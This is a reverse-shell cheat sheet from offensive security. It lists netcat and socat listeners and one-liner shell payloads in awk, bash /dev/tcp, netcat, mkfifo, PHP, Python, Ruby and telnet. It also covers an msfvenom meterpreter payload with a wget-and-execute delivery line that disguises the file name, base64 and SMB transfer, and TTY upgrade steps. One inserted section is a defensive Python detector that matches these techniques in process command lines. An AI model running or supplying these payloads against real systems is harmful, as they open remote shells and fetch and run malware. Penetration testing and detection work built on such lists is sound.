Reverse Shell

Listeners

nc -nlvp <port>
nc -nlvp <port> <<< <cmd>
socat file:`tty`,raw,echo=0 tcp-listen:<port>
socat file:`tty`,echo=0,raw udp-listen:<port>

Payloads

Awk

awk 'BEGIN {s = "/inet/tcp/0/<LHOST>/<LPORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Netcat

GAPING_SECURITY_HOLE needs to be disabled.

nc <ip> <port> -e /bin/bash
nc <ip> <port> -c /bin/bash

mkfifo + nc

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f

mknod + nc

mknod backpipe p && nc <ip> <port> 0<backpipe | /bin/bash 1>backpipe

TCP socket

/bin/bash -i > /dev/tcp/<ip>/<port> 0<&1 2>&1

PHP

php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/bash -i <&3 >&3 2>&3");'

Telnet

mknod backpipe p && telnet <ip> <port> 0<backpipe | /bin/bash 1>backpipe

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

UDP variant, to be used with the socat UDP listener above (not tested):

python -c 'import socket,pty,os;lhost="<ip>";lport=<port>;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((lhost,lport));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
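From the defender's side, the one-liners above are also a compact signature set. The following is an added example, not part of the original page: it matches process command lines against the techniques listed here (/dev/tcp redirects, nc -e/-c, named-pipe plus nc, socket+dup2, pty.spawn, fsockopen/TCPSocket+exec, awk /inet/tcp); the process listing it scans is constructed sample data.

```python
import re

# Indicators derived from the payloads on this page: (technique, regex over a command line).
REVERSE_SHELL_PATTERNS = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/(tcp|udp)/")),
    ("netcat -e/-c exec", re.compile(r"\bnc(at)?\b.*\s-[ec]\s+/bin/(ba)?sh")),
    ("mkfifo/mknod pipe to nc", re.compile(r"\b(mkfifo|mknod)\b.*\b(nc|telnet)\b")),
    ("python socket dup2", re.compile(r"socket\.socket\(.*dup2\(")),
    ("pty.spawn shell", re.compile(r"pty\.spawn\(")),
    ("php fsockopen exec", re.compile(r"fsockopen\(.*exec\(")),
    ("ruby TCPSocket exec", re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    ("awk /inet/tcp", re.compile(r"/inet/(tcp|udp)/")),
]


def classify(cmdline):
    """Return the names of every reverse-shell technique whose indicator matches."""
    return [name for name, rx in REVERSE_SHELL_PATTERNS if rx.search(cmdline)]


def scan(proc_lines):
    """Scan lines of the form '<pid> <user> <cmdline>'; return (pid, user, techniques) per hit."""
    hits = []
    for line in proc_lines:
        pid, user, cmd = line.split(" ", 2)
        techniques = classify(cmd)
        if techniques:
            hits.append((int(pid), user, techniques))
    return hits


# Constructed sample process listing (pids, users and the 203.0.113.5 address are made up).
SAMPLE_PROCS = [
    "1201 root /usr/sbin/sshd -D",
    "1377 www-data /bin/bash -i > /dev/tcp/203.0.113.5/4444 0<&1 2>&1",
    "1402 postgres /usr/bin/nc -zv db.internal 5432",
    "1455 www-data rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 4444 >/tmp/f",
    "1460 deploy python3 -c 'import socket; print(socket.gethostname())'",
    "1488 www-data python -c 'import socket,pty,os;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);"
    "s.connect((\"203.0.113.5\",4444));os.dup2(s.fileno(),0);pty.spawn(\"/bin/bash\")'",
]

if __name__ == "__main__":
    for pid, user, techniques in scan(SAMPLE_PROCS):
        print(f"pid={pid} user={user} techniques={techniques}")
```

A plain `nc -zv` port check and a benign `import socket` script produce no hit, while the three payload shapes from this page do.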

Drop a file

Payloads

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=<ip> lport=445 -f elf -o test.elf

Delivery

wget <ip/domain>/test.elf -O /tmp/<less_suspicious_executable_name> && chmod 777 /tmp/<l_s_e_n> && /tmp/<l_s_e_n> && rm /tmp/<l_s_e_n>

Copy (base64)

1) cat file2upload | base64
2) Create the file on the target and paste the encoded content into it
3) cat fileWithBase64Content | base64 -d > finalBinary

Alternative delivery over SMB: impacket-smbserver w00t .

Interactive reverse shell

nc -nlvp <port>                                  # local: start the listener
python -c 'import pty; pty.spawn("/bin/bash")'   # remote: spawn a pty
[CTRL + Z]                                       # local: background the shell
echo $TERM                                       # local: note the terminal type
stty -a                                          # local: note rows and columns
stty raw -echo                                   # local: raw mode for the local terminal
fg                                               # local: bring the shell back
reset                                            # remote
export SHELL=bash                                # remote
export TERM=xterm-256color                       # remote: according to "echo $TERM"
stty rows 38 columns 116                         # remote: according to "stty -a"
stty -raw echo                                   # local: restore the terminal once the session ends